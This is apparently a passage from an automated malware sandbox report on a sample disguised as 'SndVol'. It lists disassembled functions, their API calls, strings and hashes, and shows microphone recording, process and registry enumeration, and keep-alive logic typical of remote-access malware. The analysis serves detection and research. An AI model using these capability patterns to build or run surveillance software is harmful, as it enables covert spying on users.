SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Function 053605CA Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0536CC84: GetCurrentProcess.KERNEL32(00000003,?,?,0536BF9E,00000000,004750E4,00000003,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0536CC95
Part of subcall function 0536CC84: IsWow64Process.KERNEL32(00000000,?,?,0536BF9E,00000000,004750E4,00000003,0046739C,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0536CC9C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 053605E8
Process32FirstW.KERNEL32(00000000,?), ref: 0536060C
Process32NextW.KERNEL32(00000000,0000022C), ref: 0536061B
CloseHandle.KERNEL32(00000000), ref: 053607D2

Part of subcall function 0536CCB2: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,053602C6,00000000,?,?,00475338), ref: 0536CCC7
Part of subcall function 0536CCB2: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0536CCD2

Part of subcall function 0536CEAA: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0536CEC2
Part of subcall function 0536CEAA: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0536CED5

Process32NextW.KERNEL32(00000000,0000022C), ref: 053607C3

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2180151492-0
Opcode ID: e6456f02d5d18d61e9a12733028e8d68b1b409d8be02be40c90b48580702cd70
Instruction ID: a625aa35f2dc6df88dfd2525b91b5c2afcf1be4cc32c5190917f48c0b685f01b
Opcode Fuzzy Hash: e6456f02d5d18d61e9a12733028e8d68b1b409d8be02be40c90b48580702cd70
Instruction Fuzzy Hash: 4A412F356082449BD339FB20DC58EEF73E9BF94350F50992DE88A83195EF305A4AC756

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Function 00401BE9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Function 053A1689 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 053A16A1

Part of subcall function 0539744F: HeapFree.KERNEL32(00000000,00000000,?,053A193C,?,00000000,?,00000000,?,053A1BE0,?,00000007,?,?,053A212B,?), ref: 05397465
Part of subcall function 0539744F: GetLastError.KERNEL32(?,?,053A193C,?,00000000,?,00000000,?,053A1BE0,?,00000007,?,?,053A212B,?,?), ref: 05397477

_free.LIBCMT ref: 053A16B3
_free.LIBCMT ref: 053A16C5
_free.LIBCMT ref: 053A16D7
_free.LIBCMT ref: 053A16E9

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: c4ed482aadffc3353693d21aafdebdbf7a7a51cc31b47088e982486656baae32
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: AFF096B36182006BCF24EB58E885D1677EDFA45B10B9C6809F649DB5B0C770F8C0C658

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Function 0539C704 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 0539C706

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 31b5396298e6fccfc78706356fe663c712917264f0e1acd7aa1b9484dbd217c1
Instruction ID: 855c33fdfb769914c36b17a646fd91fa821b127dc6947adfd6039aafffbc388a
Opcode Fuzzy Hash: 31b5396298e6fccfc78706356fe663c712917264f0e1acd7aa1b9484dbd217c1
Instruction Fuzzy Hash: 03519CB1A1420EAADF1AEFA8C848EFEBBB9AF49310F041159E415B7290D7719D01CB61

Function 00413A55 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B

Strings

[regsplt], xrefs: 00413C17

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs
